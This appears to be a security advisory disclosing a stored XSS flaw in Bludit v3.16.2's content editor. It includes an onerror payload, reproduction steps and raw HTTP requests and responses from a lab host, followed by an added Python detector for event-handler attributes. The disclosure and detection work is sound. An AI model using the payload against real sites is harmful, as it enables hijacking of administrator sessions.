Bludit v3.16.2 "Add New Content" Stored XSS Vulnerability Analysis

This article discloses a stored cross-site scripting (XSS) vulnerability in the "Add New Content" feature of the Bludit v3.16.2 content management system, with full reproduction steps, the HTTP request/response data, and an analysis of how the vulnerability is triggered.

Title: Stored XSS "Add New Content" Functionality - bludit v3.16.2

Date: July 2025

Author: Andrey Stoykov

Version: 3.16.2

Tested on: Debian 12

Blog: https://msecureltd.blogspot.com/

Stored XSS "Add New Content" Functionality #1:

Steps to Reproduce:

  1. Log in with an administrator account and open "New Content"
  2. In the "Source code" field, enter the following payload: <iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
  3. Click "Preview"; the XSS payload fires

// HTTP POST request to add new content

POST /bludit/admin/new-content HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[…]

tokenCSRF=03a860fcc567fed86f6cb57e5877a469ef27e2ac&uuid=b219c568827ee49d5b8be839d6ab1043&type=published&coverImage=&content=<img+src%3d""+onerror%3d"alert(document.domain)">&category=&description=&date=2025-06-04+15%3A15%3A17&typeSelector=published&position=3&tags=&template=&externalCoverImage=&slug=xss&noindex=0&nofollow=0&noarchive=0&title=xss

// HTTP response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 Jun 2025 19:16:04 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: Bludit
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /bludit/admin/content
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

// HTTP GET request that triggers the XSS

GET /bludit/admin/edit-content/xss HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[…]

// HTTP response

HTTP/1.0 200 OK
Date: Wed, 04 Jun 2025 19:16:06 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: Bludit
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
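As an added defensive example (not part of the advisory or of Bludit's own code), the following Python script decodes a form body shaped like the POST above and flags inline event-handler attributes and javascript: URLs in the `content` parameter, the kind of check a server-side validator or a review of request logs would apply before such content is stored. The sample body is constructed from the advisory's request with the CSRF token and uuid replaced by placeholders.

```python
import re
from urllib.parse import parse_qs

# Constructed sample body modelled on the advisory's POST to /bludit/admin/new-content.
# Token and uuid are placeholders; the content field carries the advisory's payload, URL-encoded.
SAMPLE_BODY = (
    "tokenCSRF=PLACEHOLDER_TOKEN&uuid=PLACEHOLDER_UUID&type=published&coverImage="
    "&content=%3Ciframe%3E%3Ctextarea%3E%3C%2Fiframe%3E"
    "%3Cimg+src%3D%22%22+onerror%3D%22alert(document.domain)%22%3E"
    "&category=&description=&slug=xss&title=xss"
)

# A start tag: element name plus everything up to the closing '>'. End tags (</x>) do not match.
TAG_RE = re.compile(r"<\s*([a-zA-Z][\w-]*)([^>]*)>")
# name=value pairs inside a start tag; quoted or bare values.
ATTR_RE = re.compile(r"""([a-zA-Z_:][\w:.-]*)\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+)""")
URL_ATTRS = {"src", "href", "action", "formaction", "xlink:href"}


def risky_attributes(html):
    """Return (tag, attribute, value) for every inline event handler (on*)
    and every URL attribute whose value starts with 'javascript:'.
    Regex-based and deliberately simple: HTML entities are not decoded,
    so this is a detector for review, not a replacement for a real sanitizer."""
    findings = []
    for tag_match in TAG_RE.finditer(html):
        tag = tag_match.group(1).lower()
        for attr_match in ATTR_RE.finditer(tag_match.group(2)):
            name = attr_match.group(1).lower()
            value = attr_match.group(2).strip("\"'")
            if name.startswith("on"):
                findings.append((tag, name, value))
            elif name in URL_ATTRS and value.strip().lower().startswith("javascript:"):
                findings.append((tag, name, value))
    return findings


def inspect_new_content(body):
    """Decode an application/x-www-form-urlencoded body (as sent to
    admin/new-content) and inspect its 'content' field."""
    params = parse_qs(body, keep_blank_values=True)
    content = params.get("content", [""])[0]
    return {"slug": params.get("slug", [""])[0], "findings": risky_attributes(content)}


if __name__ == "__main__":
    result = inspect_new_content(SAMPLE_BODY)
    for tag, attr, value in result["findings"]:
        print(f"slug={result['slug']}: <{tag} {attr}={value!r}> should be stripped or rejected")
```

Because the check runs on the decoded `content` value rather than on the rendered page, it flags the payload whether or not the editor's preview later parses the iframe/textarea prefix the way a browser does.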